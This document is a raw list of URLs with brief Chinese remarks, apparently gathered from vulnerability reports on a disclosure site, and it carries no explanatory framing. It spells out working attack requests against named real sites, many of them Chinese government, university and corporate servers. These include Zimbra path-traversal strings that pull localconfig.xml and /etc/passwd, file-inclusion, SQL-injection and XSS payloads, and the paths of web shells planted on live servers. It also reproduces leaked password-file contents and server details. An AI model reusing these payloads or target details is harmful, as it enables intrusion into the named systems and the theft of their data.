http://api.tudou.com/auth/authorize.oauth?oauth_token=0555db89d8584763b600f4729c75f6ac&oauth_callback=http%3A%2F%2Fwww.youku.com%2Fpartner_tudouLoginCallback_wintype_null_operateStfrom_null http://api.open.uc.cn/authorize?client_id=20032&redirect_uri=http%3A%2F%2Flogin.weibo.cn%2Flogin%2Fuc_callback%3FbackURL%3Dhttp%253A%252F%252Fweibo.cn%252F%26amp%3BbackTitle%3D%25E6%2596%25B0%25E6%25B5%25AA%25E5%25BE%25AE%25E5%258D%259A%26amp%3Bvt%3D4%26amp%3Brevalid%3D2%26amp%3Bns%3D1&response_type=code error:redirect_uri_mismatch http://api.open.uc.cn/authorize?client_id=20032&response_type=code&redirect_uri=http%3A%2F%2Flogin.weibo.cn%40wooyun.org http://login.weibo.cn@wooyun.org http://www.qyslyj.gov.cn/html/jgsz/005515837.html http://www.qyslyj.gov.cn/FooSun_Data/FooSun_Data.mdb http://api.mam.sdo.com/index.php?g=Admin&m=Index http://api.mam.sdo.com/index.php?g=Admin&m=Admin http://api.mam.sdo.com/index.php?g=Admin&m=Admin&a=addAdmin http://api.mam.sdo.com/index.php?g=Admin&m=News&a=Add http://yzw.gdut.edu.cn/content.php?id=1859&typeid=183 http://yzw.gdut.edu.cn/login.html http://pccarertest.lenovo.com.cn:81/lenovo http://www.cydaj.gov.cn:80/Get/xxwj/onews.asp?id=575利用SQL注入可获取该网站的数据库信息,利用获取的用户名和密码登陆后台,可执行添加管理员及修改网站信息操作。 http://soft.talkweb.com.cn:8888/wcm/html/login.html www.mingxiao100.com http://www.182871.okwei.com/zhu.html?o=t&i=0&r=2&s=%25u8749%25u9E23&m=c_1 http://www.513vpn.cn/logs/error_log http://www.513vpn.cn/chkforgotpwd.php?username=caoool&action=mb http://s.zj189.cn/index.jsp?fromid=mall http://job.gdit.edu.cn/admin/manager/admin_voting_show.php?page_id=9 http://zsb.gdit.edu.cn http://www.lzgd.com.cn/ http://oa.lzgd.com.cn:8000/ http://bbs.open.t.qq.com/uc_server/data/config.inc.php http://movie.skyworth.com/manager/Default.aspx http://www.okshe.com/ ext:webkit协议可导致HTTP- ext:webkit:file:///mnt/sdcard/UCDownloads/localexec_payload.html ext:uc_dw:http://127.0.0.1:8888/localexec_payload.html http://www.513vpn.cn/logs/error_log www.513vpn.cn/baitianlei/ www.513vpn.cn/log/2013-08-09_alipay.log http://ting.zhangyue.com/ShowInfo.php?classid=176&id=9759&userid=undefined http://112.125.94.68/acc/business.do?method=crequest http://zone.wooyun.org/content/8960 http://mail.womai.com/zimbra/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 http://qk.cams.cma.gov.cn//jams/ch/index.aspx?quarter_id=m5sgekrP&year_id=2013 http://www.cz-fzb.gov.cn/vote/voteview.asp?questionid=2&VoteID=11 http://mobile.womai.com/wmapi/addressedit http://127.0.0.1/thinksaas/index.php?app=../../../../../../../../../../windows/win.ini%00.jpg http://www.hhhtld.gov.cn/inc/newfiele.asp?admin http://www.gzsp.gov.cn/admin/info_edita.jsp http://www.pzhsgdj.gov.cn/_WebDataFile/2005/06/shell.asp http://www.bjunesco.gov.cn/tz/asp.asp?T=ABGHIJKLMCDEF http://www.hnnjj.gov.cn/UserFiles/file/web.jsp http://www.edm.edu.cn/inside/cqsz.jsp http://zs.nacta.edu.cn/help.jsp http://jsjx.cuit.edu.cn/fileupload/images/upload/jspspya.jsp http://ssoc.cuit.edu.cn/fileupload/images/upload/jspspya.jsp http://www.cjpp.net/EN/column/jspspy.jsp http://course.lixin.edu.cn/course_center/files_upload/resource/X.jsp http://haoma.sogou.com/feed.php?v=1.2&hid=863077024535217&is=460006132136291&r=10114&dev=android&appvers=2.3.7.18220 http://zone.wooyun.org/content/8960 http://ccert.edu.cn/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 http://ccert.edu.cn/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 https://ccert.edu.cn:7071/zimbraAdmin/ http://www.lnly.gov.cn:8084/zxyg/frontNoteFind!userNoteList.action http://61.132.0.114:8080/lygApp/allAdvice.action http://product.imp3.net/product.php?id=7308 http://www.iiyi.com/i/tupu/index/count?tid=1存在盲注漏洞 http://dongman.zhangyue.com/Templates/Man16/Search.aspx?keys=12 www.lnhndf.com,我查了一下,这个公司确实做这个业务。真的好诡异!!! http://222.39.14.14/ http://222.39.14.168/security/index.aspx http://222.39.14.168/security/bindex.aspx http://222.39.14.168/security/workerlongin.aspx职工安全信息管理信息系统 http://222.39.14.168/security/managerlongin.aspx http://www.nmqyjl.com/的网站 http://www.nmqyjl.com/Book.asp http://www.nmqyjl.com/fkly.asp http://222.39.14.164/xz.asp http://222.39.14.218/ http://lib.jyc.edu.cn/news/show_news.jsp?news_id=108 http://www.exploit-db.com/exploits/30085/ http://mail.infzm.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 http://mail.infzm.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 http://www.19mcc.com.cn/company_detail.php?id=18” http://www.hlfire.gov.cn:8080/admin/index.action http://www.hlfire.gov.cn:8080/company/toLogin.action clsid:A74BF134-5213-46B5-AF36-CE1888315DC7 http://labs.idefense.com http://hcmail.hc360.com/zimbra/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx http://www.exploit-db.com/exploits/30085/ http://mail.people.com.cn/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip http://api.rd.xdf.cn/login.aspx db_name:TeachingPlanDB db_user:db_youneng http://app.xdf.cn/apps/category.php?sys=apple&idfrom=0&idcount=3&type=187 http://app.xdf.cn/apps/category.php?sys=apple&type=187&idfrom=0&idcount=3 http://job.admin5.com/Company/Com_Search.aspx?cvalid=1802 http://cj.xmut.edu.cn/cexmut/webConfigSet/configSetting.aspx?url=/login/index.aspx http://www.zscj.com.cn/jxjy/webConfigSet/configSetting.aspx?url=/jxjy/login/index.aspx http://210.43.0.25/webConfigSet/configSetting.aspx?url=/login/index.aspx http://59.74.193.139/webConfigSet/configSetting.aspx?url=/login/index.aspx http://120.203.1.254:1083/webConfigSet/configSetting.aspx?url=/login/index.aspx http://sns.com.cn/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 http://httpdazhangmen.playcrab.com/dzmpay2.php http://httpdazhangmen.playcrab.com/news_zw.php?aid=134 http://i-high.xdf.cn/webmanage/ http://i-high.xdf.cn/webmanage/system_dntb/uploadImg.aspx http://i-high.neworiental.org http://xiyigui.v5shop.com/manage后台免验证,水印上传拿shell,备案信息文件上传拿shell http://diysite.cdnhost.cn http://diysite.cdnhost.cn/news/html/?37'.html http://app.lenovo-idea.com/admin/login http://bx.cq.dyxfc.net http://v.17173.com/live/rank/rank.action PATH:/home/httpd/html/active/live/agreement/img/ encap:Ethernet F3:FC:4A:F8:F4 addr:117.27.230.153 Bcast:117.27.230.191 Mask:255.255.255.192 fcff:fe4a:f8f4/64 Scope:Link MTU:1500 packets:5667640 packets:2489078 txqueuelen:1000 http://saas.sundns.com/questions_details.aspx?ID=63 http://app.relonline.cn/download.php?file=../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin saslauth:x:498:496:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin avahi:x:70:70:Avahi Stack:/var/run/avahi-daemon:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin pulse:x:497:495:PulseAudio Daemon:/var/run/pulse:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin user:x:500:500:root:/home/user:/bin/bash yyy:x:501:501::/var/www/vhosts:/bin/bash www-data:x:496:490:www-data:/home/www-data:/bin/bash mysql:x:495:489:mysql:/home/mysql:/bin/bash wsf:x:502:502::/var/www/vhosts/horizon.lenovo.com.cn:/bin/bash pinotage:x:503:503::/var/www/vhosts/www.pinotage.me:/bin/bash nagios:x:494:488::/var/spool/nagios:/sbin/nologin http://weixin.lenovo-idea.com/admin/login url:http://mail.qiban365.com/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 http://lenovo.marketviewrc.com/sendcode.asp?username=e http://wps.talkweb.com.cn/tameai/TAMEAI/index.jsp http://www.itsmoe.com/Admin/File.aspx http://fm.tom.com http://fm.tom.com/a.rar http://fm.tom.com/dj-detail?ascription=--%3E%3Cscript%3Ealert%28123%29;%3C/sCript%3E http://fm.tom.com/1.txt http://dynamic.i.xunlei.com/ajax?c=user&a=myvip&callback=xsscode http://dynamic.i.xunlei.com/ajax?c=user&a=myvip&callback=%3Cscript%3Ealert%281%29%3C/script%3E http://niu.lashou.com/user/User/feedBack http://niu.lashou.com/user/User/feedBack http://www.gdfcl.com.cn/gdfcl/into/intolist.action;jsessionid=F615B1674EED74CFA8A0FB53CD9D8BFE http://www.gdfcl.com.cn/gdfcl/csss.jsp http://www.gdfcl.com.cn/gdfcl/cd.jsp http://www.gdfcl.com.cn/phpmyadmin/ http://www.gdfcl.com.cn/gdfcl/reshell.jsp(被转发至1.202.233.6 http://yangtian.lenovo.net http://yangtian.lenovo.net/userportal/productdetails.aspx?ID=c5KvbMJS https://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 https://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 http://it.homeinns.com/MymyitSrv/QueryLog.aspx http://mail.nxca.gov.cn/ http://www.driverdevelop.com/showsideline.php?id=645 http://123.125.219.44:8080/appDemo/login.jsp http://123.125.219.39/system/index.action http://it.homeinns.com/ito_beta/Main/Login.aspx http://dev.mumayi.com/ http://www.dianning.com/ http://www.eecn.com.cn/about/login.action http://bbs.uuu9.com/plugin.php?id=auction&action=search http://lbs.189.cn/ http://www.scal.com.cn/Invite2011/Detail.aspx?ID=8270 http://wx.233.com/login/?redirectURL=http://www.baidu.com http://wx.233.com/search/UserCenter/dy/admin/ProjectOrder/ http://wx.233.com/search/UserCenter/dy/admin/ProjectOrder/List.aspx?page=6 http://www.coalworld.net/jsp/info/ http://www.coalworld.net/jsp/channel/ http://www.coalworld.net/images/ http://www.coalworld.net/jsp/inc/ http://www.coalworld.net/indexnews/ http://www.coalworld.net/js/ http://www.coalworld.net/jsp/infopublic/ http://www.coalworld.net/publicfile/ http://219.143.235.36/index.php http://219.143.235.36:8080/snspam/homepage.asp http://www.111g.com/bbs/config/.svn/entries http://www.111g.com/bbs/config/.svn/text-base/config_global.php.svn-base http://www.111g.com/bbs/config/.svn/text-base/config_ucenter_default.php.svn-base http://erdosrcb.com/onewsn.asp?id=778 http://erdosrcb.com/onewsn.asp?id=778’,提示数据库出错 http://erdosrcb.com/onewsn.asp?id=778%20and%201=1 http://erdosrcb.com/onewsn.asp?id=778%20and%201=2 http://erdosrcb.com/admin/ercblogin.asp http://chat.shenghuojia.com/web/icc/chat/chat http://www.jlyy.gov.cn:8080/news!newsYyzhShow.action存在远程命令执行漏洞 https://smtp.yuchaihi.com:7071/zimbraAdmin/ http://www.cdip66.com/ http://www.cdip66.com/dede/ http://www.exploit-db.com/exploits/30085/ http://www.exploit-db.com/exploits/30085/ http://wooyun.org/bugs/wooyun-2013-040647 http://www.hbtysx.com:8080/MobileNews/mobile_win.action http://test.com/testpath/download.jsp?downfile=WEB-INF/web.xml http://java.sun.com/xml/ns/javaee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd http://192.168.0.186:8081/cas/login https://192.168.0.186:8081/cas/proxyValidate http://kingosoft.com/tld/ui http://test.com/testpath/download.jsp?downfile=c:boot.ini http://km.ip66.com/xz.php http://dongman.zhangyue.com/ http://dongman.zhangyue.com/WebResource.axd?d=6-LIxoJhrcD8PLx88H57pg2 http://dongman.zhangyue.com/ScriptResource.axd http://dongman.zhangyue.com/ScriptResource.axd?d=xa77lWQR9EdH0pnOad0AXtqoxiN60vpEYE9wvvWrHsoAAAAAAAAAAAAAAAAAAAAA0 http://dongman.zhangyue.com/templates/man16/indexzm.aspx?ty=-1 http://api.t.sohu.com/oauth/authorize?oauth_token=59910bf4d1d24620538dea201220eee4&oauth_callback=http%3A%2F%2Fone.bshare.cn%2Foauth%2Fcallback%3Fsite%3Dsohuminiblog http://hndczx.mep.gov.cn/mo/doc_view.jsp?newsid=bc7a0706-0142-1000-e000-0017c0a80721 http://sd.china.com.cn http://pop.pcpop.com/utility/convert/index.php http://biz.dazhe.qingdaonews.com/post_guestbook.php http://biz.dazhe.qingdaonews.com/post_guestbook.php http://venus.suning.com http://venus.suning.com/CN/user.aspx?act=tag&type=1&id=4 http://desk.yunduan.cn/bbs/utility/convert/index.php http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://wooyun.org/bugs/wooyun-2013-045611 http://bbs.game.tom.com/utility/convert/index.php http://www.lenovodm.cn http://staff.lenovogift.net http://staff.lenovogift.net/manager.asp http://staff.lenovogift.net/en/images/acu_test_OBboi.asp;.jpg http://zhangzhou.focus.cn/housemarket/type_search/index.php?page=10&location=0&bedroom=0&sittingroom=0&bathroom=0&low_build_area= http://www.cn010w.com/ http://bbs.feidee.com/convert/ http://one-push.han101.com/api/device_token?ver=iphone http://one-push.han101.com/info.php http://sosu.qidian.com/ http://www.cttzj.com/newfile/inc/hits.asp?news_id=250 http://qiaodan.tom.com/1.php http://tangyuan.tom.com/go.php http://tangyuan.tom.com/activity/20101001/hjsm_activity.php http://mia.relonline.cn/download.php?file=/../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin saslauth:x:498:496:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin avahi:x:70:70:Avahi Stack:/var/run/avahi-daemon:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin pulse:x:497:495:PulseAudio Daemon:/var/run/pulse:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin user:x:500:500:root:/home/user:/bin/bash yyy:x:501:501::/var/www/vhosts:/bin/bash www-data:x:496:490:www-data:/home/www-data:/bin/bash mysql:x:495:489:mysql:/home/mysql:/bin/bash wsf:x:502:502::/var/www/vhosts/horizon.lenovo.com.cn:/bin/bash pinotage:x:503:503::/var/www/vhosts/www.pinotage.me:/bin/bash nagios:x:494:488::/var/spool/nagios:/sbin/nologin http://app.lenovoprinter.cn/admin/login http://api.m.kfc.com.cn/index.php/restaurant/actDetail/ http://stu.wyu.edu.cn/eclub/admin/ http://dept.wyu.edu.cn/wlyl/login.asp http://dept.wyu.edu.cn/jidianxi/gdsyzx/admin_south/ http://job.wyu.edu.cn/scda/picshow.php?act=intopic&aid=3 http://222.75.160.184/login_loginSystem.do,通过工具检测存在strut2命令执行漏洞: http://125.39.193.136/org/login/registerUser.action www.bankofchancheng.com http://czxjgl.czedu.gov.cn/checklogin.asp这个url,有个post的注入 http://czxjgl.czedu.gov.cn/checklogin.asp http://corp.hunantv.com/jobs/在搜索框中输入q% http://act.hunantv.com/cmsapi/job.php处请求json数据。由于是异步传输数据,sqlmap等工具无法识别页面的不同,导致无法注入。 http://act.hunantv.com/cmsapi/job.php处请求json数据。代码如下 http://www.xaepi.gov.cn/shownews.php?id=363 http://www.alijijinhui.org/ http://www.alijijinhui.org/project/?skey=1 http://www.alijijinhui.org的阿里云服务器 http://www.51duide.com/index.php/Trial/trial_content/trial_id/12%27%20and%201=%271 http://gy.haierzmd.com http://gy.haierzmd.com/zclr1.asp?ID=60 http://service2.china.org.cn/question/china_cn/kms/check.php.bak?page=1 http://wap.118114.cn http://wap.118114.cn/bst/star/c.jsp?fr=bst&t=../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/etc/news:/sbin/nologinuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologindbus:x:81:81:System bus:/:/sbin/nologinvcsa:x:69:69:virtual owner:/dev:/sbin/nologinrpm:x:37:37::/var/lib/rpm:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinnetdump:x:34:34:Network user:/var/crash:/bin/bashnscd:x:28:28:NSCD Daemon:/:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinrpc:x:32:32:Portmapper user:/:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinrpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologinpcap:x:77:77::/var/arpwatch:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologinsquid:x:23:23::/var/spool/squid:/sbin/nologinwebalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologinxfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinpegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologinlujingyun:x:0:0::/home/jiangyong:/bin/bashxunjian:x:0:0::/home/xunjian:/bin/bashzhouwen:x:0:0::/home/luwenqiang:/bin/bash http://wap.118114.cn/bst/star/c.jsp?fr=bst&t=../../../../../../../../etc/resolv.conf http://wap.118114.cn/bst/star/c.jsp?fr=bst&t=../../../../../../../../etc/my.cnf view-source:http://live.acfun.tv/1548 http://staticlive.acfun.tv/common/simplayer/playerProductInstall.swf rtmp://vplay.acfun.tv/live rtmp://send.acfun.tv/live http://club.sohu.com//more/dahuasohu_cache.php?kindid=664 http://sqlmap.org http://bbs.appchina.com/static/image/common/swfupload.swf www.meihuainfo.com网站配置不当致站点沦陷 http://www.meihuainfo.com/wp-config.php.bak http://bbs.weiqi.tom.com/static/image/common/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28/xss/%29}}// http://www.pigai.org/index.php?c=us&a=experience&id=5 http://www.motel168.com/getPromoteCityJson.html?article_Id=31 http://www.jxmtdzj.com/ShowVote.php?id=3 http://www.chinatmg.com http://www.chinatmg.com/chinatmg.rar http://www.chinatmg.com/whir_system/module/ http://www.chinatmg.com/uploadfiles/ http://www.chinatmg.com/sitecn/ http://www.chinatmg.com/sdcm2011102105481/ http://www.chinatmg.com/whir_system/module/security/ http://www.chinatmg.com/whir_system/module/config/upload.aspx http://www.chinatmg.com/whir_system/module/picture/radiopictureselect.aspx http://bbs.letv.com/static/image/common/swfupload.swf http://ul.letv.com/static/image/common/swfupload.swf http://oa.tclking.com http://oa.tclking.com/companycase/CompanyGonggPrint.aspx?documno=S2012084700 http://e.189.cn/getPassword.do http://wwwen.zte.com.cn/WEB-INF/classes/searcher.properties http://www.zteict.com/idcgs.aspx?id=31 http://mobsupport.zte.com.cn/eagent/upload http://jbqgb.jxnews.com.cn/article.php?newsid=1883 http://dev.jxnews.com.cn/yw/ms/view.php?id=11970 http://zqgd.edatahome.com:9090/ACS-server/ACS http://180.169.60.66:7547/cpe http://www.51yunlu.com/install/install.sql http://www.51yunlu.com/php.php http://www.51yunlu.com/admin.php?r=sys/caseindex&keys=123 http://www.51yunlu.com/official.php?r=index/checkCompanyName&clientid=company1&rand=1386745206590&username=e&com_name=e&_=1386745198036 http://daishoudian.tieyou.com/province.html http://bbs.m.qq.com/uc_server/data/config.inc.php http://220.181.153.[马赛克 http://220.181.153.[马赛克]:80/ http://218.62.24.141:8080 http://i.hjsm.tom.com/js/fckeditor//editor/filemanager/connectors/uploadtest.html http://express.banggo.com/.svn/entries http://old.homeinns.com/WebService/Order.asmx http://pk.tom.com/web/userChat.do?cmd=deleteSingleMsg&id=1487331&mode=send http://www.51cto.com/o1k2.txt http://os.51cto.com http://network.51cto.com http://netsecurity.51cto.com http://server.51cto.com http://database.51cto.com http://mobile.51cto.com/ http://book.51cto.com/ http://expert.51cto.com/ http://www.wnet.com.cn/member/newadmin/注册后虽然是为审核状态 http://www.wnet.com.cn/member/newadmin/FCKeditor/editor/filemanager/connectors/test.html因为登录后才有操作编辑器的权限。然后上burp截断可上传shell http://my.jcpeixun.com/Account/exchangecoin.aspx?coinnumber=-400000000 http://wap.kuwo.cn/wap/wap/Model?id=11 http://wap.kuwo.cn/wap/wap/Model?id=11 http://wap.kuwo.cn/wap/wap/Series?id=11 http://wap.kuwo.cn/wap/wap/Series?id=11 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin mysql:x:101:104:MySQL server:/var/lib/mysql:/bin/bash http://zzxlrz.hnbys.gov.cn:8182/XLRZ/common/queryNonLogin.action http://www.cqta.gov.cn/test.aspx http://www.cqta.gov.cn/cquinfo/List.aspx?id=106 http://127.0.0.1/startbbs/index.php/user/login http://127.0.0.1/startbbs/index.php/home/getmore/w.jsp http://heilanequestrian.com/account/login.html http://www.tieyou.com/ajax/getGaotieCitysByProvince.html?province=1 http://backyard.csdncms.csdn.net http://www.cs-airport.com/ http://www.qiaopier.com/UserControls/Navtuandetail.aspx?catas=44,93,4,37,104,58,57,106,56,55,16,105 site:http://pt.3g.qq.com/sv?vsid= http://125.93.53.68:8080/console/system/jsp/login.jsp http://active.b2b.hc360.com/HCStory/Search.aspx?id=2 http://maintain.org.hc360.com/maintain/User/login.action jobs.dfem.com.cn/?tag=show_post&part=postshzp&cateid=19&id=22 http://www.dfem.com.cn/?p=admin http://www.chinauib.com/zt/vocational_ny.asp?id=167 http://support.zte.com.cn/support/ind*~1*/.aspx访问,返回 http://support.zte.com.cn/support/ino*~1*/.aspx访问,返回 http://www.dongjiang.gov.cn/aspx.aspx http://www.csmap.gov.cn/iportal/iportalIndex.action http://www.nan-gang.gov.cn/default.aspx http://www.nan-gang.gov.cn/TZFW/NanGangYouShi.aspx?sCode=JCSS http://sn.mail.chinaunicom.cn/owaweb2/ http://help.cnaaa.com/include/dialog/select_soft.php http://help.cnaaa.com/adminsj/login.php http://law.inc.hc360.com/finance/detail.aspx?fund_code=20110408-008 http://law.inc.hc360.com/finance/PrintPage.aspx?fund_id=199494 http://59.151.102.27:8081 http://www.dongfeng-nissan.com.cn/dealer/nissan/zhejiang/wenzhou/wzjhong/news?newstype=NewsType_004 http://v9.demo.phpcms.cn/ 